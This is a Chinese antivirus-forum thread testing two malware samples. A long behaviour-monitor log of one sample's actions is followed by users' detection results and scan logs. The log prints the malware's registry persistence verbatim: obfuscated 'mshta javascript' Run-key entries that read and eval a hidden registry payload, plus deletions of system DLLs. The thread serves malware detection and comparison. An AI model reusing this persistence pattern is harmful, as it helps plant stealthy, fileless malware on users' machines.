2016-5-14 星期六 23:53:50        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll""
2016-5-14 星期六 23:53:51        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:51        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\microsoft.net\framework\v2.0.50727\ngen.exe        允许        [应用程序]*        命令行: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ngen.exe install /queue:1 /silent /nologo /NoDependencies "System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
2016-5-14 星期六 23:53:54        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\PATH        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment        值: %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:53:55        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        向其他进程发送消息        c:\windows\system32\csrss.exe        允许        [应用程序]*        消息: WM_SETTINGCHANGE
2016-5-14 星期六 23:53:57        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\N29FLSY4\Microsoft.PowerShell.GraphicalHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:58        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\ET06CJPW\Microsoft.PowerShell.Editor.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:58        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\F08GOW4D\Microsoft.PowerShell.GPowerShell.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:59        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\8S9Q6N4L\Microsoft.PowerShell.GraphicalHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:00        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\9T19HPX5\Microsoft.PowerShell.Editor.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:00        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\G18FMTZ5\Microsoft.PowerShell.GPowerShell.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:01        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll""
2016-5-14 星期六 23:54:01        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:01        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GraphicalHost.resources.dll""
2016-5-14 星期六 23:54:02        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:02        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll""
2016-5-14 星期六 23:54:03        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:03        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Editor.resources.dll""
2016-5-14 星期六 23:54:03        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:04        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll""
2016-5-14 星期六 23:54:04        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:04        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GPowerShell.resources.dll""
2016-5-14 星期六 23:54:05        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:11        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Start        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*; Start        值: 0x00000002(2)
2016-5-14 星期六 23:54:12        c:\windows\explorer.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup        允许        [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders; *Startup        值: C:\Documents and Settings\YFeng\「开始」菜单\程序\启动
2016-5-14 星期六 23:54:12        c:\windows\explorer.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Shell Folders; *Startup        值: C:\Documents and Settings\All Users\「开始」菜单\程序\启动
2016-5-14 星期六 23:54:17        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\$968930uinstall_kb968930$\pssetupnativeutils.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" "Accessories\Windows PowerShell\Windows PowerShell.lnk"
2016-5-14 星期六 23:54:21        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*        值: mshta javascript:iBEeGf8="SbfKx";F7j=new%20ActiveXObject("WScript.Shell");MS8pkse2oM="V";DPMq50=F7j.RegRead("HKLM\\software\\dooe\\khez");KSumF8yNV="ztEguK3le";eval(DPMq50);LG5Y4CpEF="O4FVsSsxFR";
2016-5-14 星期六 23:54:21        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:21        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*        值: mshta javascript:uC4wNCM="m";j8E=new%20ActiveXObject("WScript.Shell");XvI5HLD="J";pj7jj=j8E.RegRead("HKCU\\software\\dooe\\khez");MFhT8nQ="FT";eval(pj7jj);fW5IRz2y="gbX8OP";
2016-5-14 星期六 23:54:22        c:\windows\system32\ctfmon.exe        删除注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*        
2016-5-14 星期六 23:54:22        c:\windows\system32\regsvr32.exe        创建文件        C:\Documents and Settings\YFeng\Local Settings\Application Data\a70d830f\04752aaa.bat        允许        [文件组]所有执行文件 -> [文件]*; *.bat        
2016-5-14 星期六 23:54:22        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\70f12610402684c1131da2e4ba705142\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:23        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Classes\29348bd1\shell\open\command        允许        [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Classes\*\command        值: mshta "javascript:jqn8SwHhU="YnMz7VZ";Ek7=new ActiveXObject("WScript.Shell");cNp3OxJ2Q="EV21aBt";Lvbq5=Ek7.RegRead("HKCU\\software\\dooe\\khez");ZD5xvDJ="kIwd6OCyd";eval(Lvbq5);iIKaHDdo1="tRm";"
2016-5-14 星期六 23:54:23        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup        允许        [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders; *Startup        值: C:\Documents and Settings\YFeng\「开始」菜单\程序\启动
2016-5-14 星期六 23:54:23        c:\windows\system32\regsvr32.exe        创建文件        C:\Documents and Settings\YFeng\「开始」菜单\程序\启动\b4c903ec.lnk        允许        [文件组]自动运行程序所在位置 -> [文件]c:\documents and settings\yfeng\「开始」菜单\程序\启动        
2016-5-14 星期六 23:54:24        c:\windows\system32\regsvr32.exe        删除文件        C:\Documents and Settings\YFeng\Local Settings\Application Data\ysypur\ysypur.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:54:24        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:25        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\0a489bd15f93f99835b1ba9d63a280d5\Microsoft.BackgroundIntelligentTransfer.Management.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:27        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:27        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\5fe2d84a30efa6cdd96fe19fee89db2f\Microsoft.PowerShell.Commands.Diagnostics.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:28        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Diagnostics.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:28        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\36f1bc3afab573fe3635fbd7a674dbe7\Microsoft.PowerShell.Commands.Diagnostics.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:30        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.Commands.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:31        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\6e5c1903f0d2edcf3d430aad7dc3a84f\Microsoft.PowerShell.Commands.Management.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:32        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.PowerShell.Commands.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:32        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\fa32b893bba3c73a5fde81492353780c\Microsoft.PowerShell.Commands.Management.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:35        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\Microsoft.PowerShell.Commands.Utility.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:35        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\0c517013fc9843ab04a46bab43ba92cc\Microsoft.PowerShell.Commands.Utility.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:36        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDD.tmp\Microsoft.PowerShell.Commands.Utility.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:37        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\e2d3b9fdf5508512e057d1aa8330548e\Microsoft.PowerShell.Commands.Utility.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:38        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDE.tmp\Microsoft.PowerShell.ConsoleHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:39        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\3147eaf0517b09bf345ce412642338dd\Microsoft.PowerShell.ConsoleHost.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:40        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDF.tmp\Microsoft.PowerShell.ConsoleHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:40        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\01dedf8afe9e4335937627890528524a\Microsoft.PowerShell.ConsoleHost.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:48        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE0.tmp\Microsoft.PowerShell.Editor.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:50        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\87b9dcde31da7716e9f47796f9e2efaa\Microsoft.PowerShell.Editor.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:51        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE1.tmp\Microsoft.PowerShell.Editor.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:52        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\e9e035b804d8be3a872f50d4a90243b0\Microsoft.PowerShell.Editor.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:55        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE2.tmp\Microsoft.PowerShell.GPowerShell.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:55        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\79c3b63ba991165dc493d063879af9d8\Microsoft.PowerShell.GPowerShell.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:56        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE3.tmp\Microsoft.PowerShell.GPowerShell.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:57        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\af440d1b9260f7c27554e48bd9597507\Microsoft.PowerShell.GPowerShell.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:54:59        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE4.tmp\Microsoft.PowerShell.GraphicalHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:00        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\c10f4fc71c03cdaab2ccde2784b088d6\Microsoft.PowerShell.GraphicalHost.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:01        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE5.tmp\Microsoft.PowerShell.GraphicalHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:01        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\a913f38dbbc44a5606dc6937a1364255\Microsoft.PowerShell.GraphicalHost.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:03        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE6.tmp\Microsoft.PowerShell.Security.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:04        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\9f54848d6c3eb195d838c309efd80735\Microsoft.PowerShell.Security.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:05        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE7.tmp\Microsoft.PowerShell.Security.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:05        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\849991cb95fb343b6554a6e2e133e45f\Microsoft.PowerShell.Security.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:07        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE8.tmp\Microsoft.WSMan.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:08        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Man#\381c8d4f46dfcdff21851eccbcdd3ef8\Microsoft.WSMan.Management.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:09        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPE9.tmp\Microsoft.WSMan.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:09        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Man#\da6aedf72cbae1b4d86168948814e91c\Microsoft.WSMan.Management.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:11        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEA.tmp\Microsoft.WSMan.Runtime.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:11        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Run#\f150e93956cf54e2df31f682f74647be\Microsoft.WSMan.Runtime.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:20        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEB.tmp\System.Management.Automation.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:21        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Management.A#\9b859577cb2555e27d7ecb925a44d8e2\System.Management.Automation.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:22        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEC.tmp\System.Management.Automation.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:55:22        c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe        创建文件        C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System.Management.A#\42ccb64ecacc7ad3149d7f31a32dd35a\System.Management.Automation.resources.ni.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
[/mw_shl_code]


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
绯色鎏金 + 10 版区有你更精彩: )

查看全部评分

回复

举报

wjy19800315
发表于 2016-5-14 17:35:29 | 显示全部楼层
诺顿miss




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

欧阳宣
头像被屏蔽
发表于 2016-5-14 17:41:06 | 显示全部楼层
mcafee miss
回复

举报

xyz0703
发表于 2016-5-14 17:46:51 | 显示全部楼层
bitdefender miss
回复

举报

心醉咖啡
发表于 2016-5-14 18:16:56 | 显示全部楼层
毒霸miss
回复

举报

275751198
发表于 2016-5-14 18:55:23 | 显示全部楼层
本帖最后由 275751198 于 2016-5-14 18:56 编辑

另一个本地QVM在报
360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2016-05-14 18:54:13     恶意软件(QVM42.1.Malware.Gen)MD5:70233a243fa2d2fb60294bc24f2c785a         已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360安全浏览器下载\缉毒卫队2个样本\[2]缉毒卫队

从隔离区里恢复云鉴定报风险
回复

举报

Eset小粉絲
发表于 2016-5-14 18:58:08 | 显示全部楼层
[mw_shl_code=css,true]Start of the scan: Saturday, 14 May, 2016  18:56

Starting the file scan:

Begin scan in 'C:\Users\User\Downloads\Compressed\缉毒卫队2个样本'
Successful Cloud SDK initialization and license check.
The file 'C:\Users\User\Downloads\Compressed\缉毒卫队2个样本\[1]缉毒卫队' has been uploaded to the Protection Cloud and analyzed. SHA256 = DA862DDA574C54D363E98B9674123E8638C7C33F33B69B99D2F6FBCF1E7221D3
C:\Users\User\Downloads\Compressed\缉毒卫队2个样本\[1]缉毒卫队 (SHA-256: da862dda574c54d363e98b9674123e8638c7c33f33b69b99d2f6fbcf1e7221d3)
  [DETECTION] Is the TR/Agent.da862d (Cloud) Trojan
  [INFO]      The file 'C:\Users\User\Downloads\Compressed\缉毒卫队2个样本\[1]缉毒卫队' has been uploaded to the Protection Cloud and analyzed.
C:\Users\User\Downloads\Compressed\缉毒卫队2个样本\[2]缉毒卫队
  [DETECTION] Is the TR/Dropper.jtix Trojan[/mw_shl_code]
回复

举报

2314805817
发表于 2016-5-14 19:05:47 | 显示全部楼层
ESET Kill one

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

lzy2010000
发表于 2016-5-14 19:06:17 | 显示全部楼层
卡巴,一个云拉黑,一个改为EXE扫描高启发杀。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Sailer.X 该用户已被删除
发表于 2016-5-14 19:08:01 | 显示全部楼层
